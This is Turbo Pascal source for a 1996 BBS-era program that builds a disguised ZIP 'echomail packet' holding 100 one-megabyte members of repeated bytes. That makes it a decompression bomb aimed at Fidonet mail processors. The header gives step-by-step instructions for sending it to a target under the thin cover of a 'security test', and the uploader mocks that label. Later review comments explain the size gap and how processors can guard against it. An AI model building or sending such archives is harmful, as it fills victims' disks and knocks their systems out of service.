
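Misc PC: Source code for a Pascal program to "Test Echomail Security" (yeah right) - it builds a small ZIP bundle whose members unpack to about a megabyte each, i.e. a decompression bomb aimed at echomail processors.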

(*                                                                           *)
(* MAKEA.PAS - A Turbo Pascal Program for testing Fidonet echomail security  *)
(*                                                                           *)
(* This program was written and tested in Turbo Pascal 7, it should compile  *)
(* fine in TP5.5 and 6 if that's what you have.  This file should compile    *)
(* right "out of the box" without modification; if it doesn't you might have *)
(* a hacked or corrupted copy.                                               *)
(*                                                                           *)
(* This program aids in testing the security of echomail systems in Fidonet  *)
(* by creating a valid ZIP archive echomail packet.  This packet appears     *)
(* relatively innocuous at about 100k in size (typical for many echomail     *)
(* systems) but it contains PKT files which expand to a megabyte apiece.     *)
(* Up to 100 of these 1 meg files will be created, if the target system's    *)
(* hard drive has enough space.  Fortunately, only one 1MB file is created   *)
(* on your system when you run the program.  You should have 1.5 MB free.    *)
(*                                                                           *)
(* To test the security of another system, take the following steps:         *)
(*                                                                           *)
(* (1) Compile and run this program.  It will create a packet file calling   *)
(* PKZIP.EXE (if found on your path).  This operation will take several      *)
(* minutes, depending on the speed of your system.                           *)
(*                                                                           *)
(* (2) File-attach the file to the target system.  It is very important      *)
(* that you use your own mailer with all your addresses intact and that you  *)
(* not use Caller-ID blocking, so that the target sysop knows that this is   *)
(* only a test and not an actual attack by a crasher.                        *)
(*                                                                           *)
(* That's it.  If the target system's echomail processor is insecure, there  *)
(* will be up to 100 megs of .PKT files in the target's echomail directory.  *)
(* If you are worried you might fill the target's hard disk during this      *)
(* test, you should modify the program so as to decrease the number of files *)
(* added to the packet or the size of those files.  A larger number of small *)
(* files will result in a larger packet size, and unfortunately, a higher    *)
(* likelihood that the test will *completely* fill the hard drive should the *)
(* target be careless enough not to have 100 megs free.  And of course, NEVER*)
(* send such a packet to someone who is unaware that you are conducting a    *)
(* security test or at a time when the target sysop is unlikely to be        *)
(* present to delete the .PKT files!                                         *)
(*                                                                           *)
(* This program is presented in source form because:                         *)
(*                                                                           *)
(* - this way you know for sure it has no virii or trojan surprises          *)
(*                                                                           *)
(* - you can totally reconfigure it or add features                          *)
(*                                                                           *)
(* - it's free and I don't care who hacks it up or how                       *)
(*                                                                           *)
(* - a real hacker has at least the minimal programming skill needed to      *)
(*   compile a pascal program!                                               *)
(*                                                                           *)
(*                                                                           *)
(* Program and DoubleSpeak Docs [K] KopyLeft 1996 The Kopyleftist            *)
(*                                                                           *)

{ The M directive below sets stack size, minimum heap and maximum heap.
  With the maximum heap at 0 the program does not claim the rest of DOS
  memory, so there is room left for the child process that add2zip starts
  through exec. }
{$M 8192,0,0}
uses dos;  { exec, swapvectors, fsearch, getenv and pathstr come from here }
var i:longint;               { counter for the main program's member loop }
    name,nextname:string;    { current and next member file name on disk }
    zipexe:string;           { path of PKZIP.EXE, filled in by getzipexe }

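procedure make1megfile(filename:string);
{ Creates (or truncates) the text file FILENAME and fills it with 10000
  writes of one fixed run of the character '6' - about 1 MB in total
  according to the original author's comment.

  The content is a single repeated byte, so it deflates to a tiny
  fraction of its size.  That gap between packed and unpacked size is the
  property an inbound mail processor has to check before it extracts an
  archive; the packed size alone does not bound the disk space needed.

  The loop uses a local counter so that the program-wide variable i is
  not modified as a side effect of calling this procedure. }
const
  chunk = '6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666';
var
  f: text;
  n: integer;   { local loop counter; 10000 fits in an integer }
begin
  assign(f, filename);
  rewrite(f);               { create the file, discarding any old content }
  for n := 1 to 10000 do
    write(f, chunk);        { write, not writeln: no line breaks are added }
  flush(f);
  close(f);
end;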

procedure add2zip(zipname,filename:string);
{ Runs the archiver whose path is held in zipexe with the command tail
  "ZIPNAME FILENAME".  With PKZIP that form adds FILENAME to the archive
  ZIPNAME, creating the archive if it does not exist yet.

  NOTE(review): nothing is examined after exec returns (neither DosError
  nor the child's exit code), so a failed archiver run is not reported
  and the caller carries on. }
var tail:string;
begin
  tail:=zipname+' '+filename;
  swapvectors;            { hand the saved interrupt vectors to the child }
  exec(zipexe,tail);
  swapvectors;            { take the runtime's own vectors back }
end;

procedure _rename(oldname,newname:string);
{ Renames the disk file OLDNAME to NEWNAME.  The main program uses this
  to give the one payload file a new member name before each archiver
  run, so only a single copy ever exists on the local disk. }
var handle:file;
begin
  assign(handle,oldname);    { bind the file variable; the file is not opened }
  rename(handle,newname);
end;

procedure getzipexe;
{ Looks up PKZIP.EXE through the PATH environment variable and stores the
  result in the global zipexe.  When fsearch returns an empty string the
  program prints a message and stops. }
var found:pathstr;
begin
  found:=fsearch('PKZIP.EXE',getenv('PATH'));
  if found<>'' then
    zipexe:=found
  else
    begin
      writeln('Unable to locate PKZIP.EXE in path!');
      halt;
    end;
end;

{ Main program.  Writes one payload file, adds it to the archive
  0000FFFF.MO0 as 1.PKT, then renames that same file to 2.PKT .. 100.PKT
  and adds it again under each name.  The archive name appears to follow
  the style of an echomail bundle name - the banner text below calls it
  a bogus echomail packet.

  Every member carries the same highly compressible content, so the packed
  size of the bundle says little about the disk space it needs once it is
  unpacked.  An inbound processor can bound this by comparing the unpacked
  sizes recorded in the archive directory, and the free space left in its
  inbound area, against a limit before it extracts anything. }
begin
  writeln('Makea by The Kopyleftist');
  getzipexe;
  writeln('Creating prototype file...');
  name:='1.PKT';
  make1megfile(name);
  writeln('Adding 100 copies to bogus echomail packet zipfile 0000FFFF.MO0...');
  add2zip('0000FFFF.MO0',name);
  for i:=2 to 100 do
    begin
      { build the next member name from the loop counter }
      str(i,nextname);
      nextname:=nextname+'.PKT';
      { the payload is renamed, not rewritten, and archived under the new name }
      _rename(name,nextname);
      add2zip('0000FFFF.MO0',nextname);
      name:=nextname;
    end;
end.

(* Uploaded to: Tommy's Holiday Camp BBS  1-604-361-4549 *)
